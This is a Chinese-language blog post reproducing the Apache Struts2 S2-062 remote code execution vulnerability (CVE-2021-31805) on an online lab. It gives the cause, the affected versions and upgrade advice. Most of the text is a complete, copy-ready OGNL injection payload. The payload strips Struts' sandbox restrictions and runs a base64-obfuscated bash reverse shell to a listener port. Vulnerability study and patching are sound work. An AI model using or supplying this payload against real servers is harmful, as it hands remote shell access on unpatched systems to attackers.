当前位置：网站首页>S2-062 远程命令执行漏洞复现(cve-2021-31805)

S2-062 远程命令执行漏洞复现(cve-2021-31805)

2022-04-23 12:10:00 【MH cloud】

前言

咳咳，这个漏洞吧出来也有几天了，最近一直没时间，今天加个班写一下！

一、漏洞描述

Apache Struts2是一个基于MVC设计模式的流行的Web应用程序框架。

Apache Struts2发布安全公告（S2-062），修复了Apache Struts2中的一个远程代码执行漏洞（CVE-2021-31805）。

由于对CVE-2020-17530的修复不完整，在Apache Struts 2.0.0-2.5.29中，如果开发人员使用%{...}语法应用强制OGNL解析，标签的某些属性仍然可被二次解析。当对标签属性中未经验证的原始用户输入进行解析时可能会导致远程代码执行。

二、影响范围

Apache Struts 2.0.0-2.5.29

三、修复建议

目前此漏洞已经修复，建议受影响用户及时升级更新到Apache Struts 2.5.30或更高版本。

下载链接：https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.30

缓解措施：避免对不受信任或未经验证的用户输入使用强制OGNL解析。

四、漏洞复现

复现环境：Vulfocus 漏洞威胁分析平台 在线靶场，这个靶场还是不错的

1.根据漏洞提示访问首页

2.抓包首页

3.构造payload,变更请求方法为post，

name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNTQ1NCAwPiYx}|{base64,-d}|{bash,-i}'}))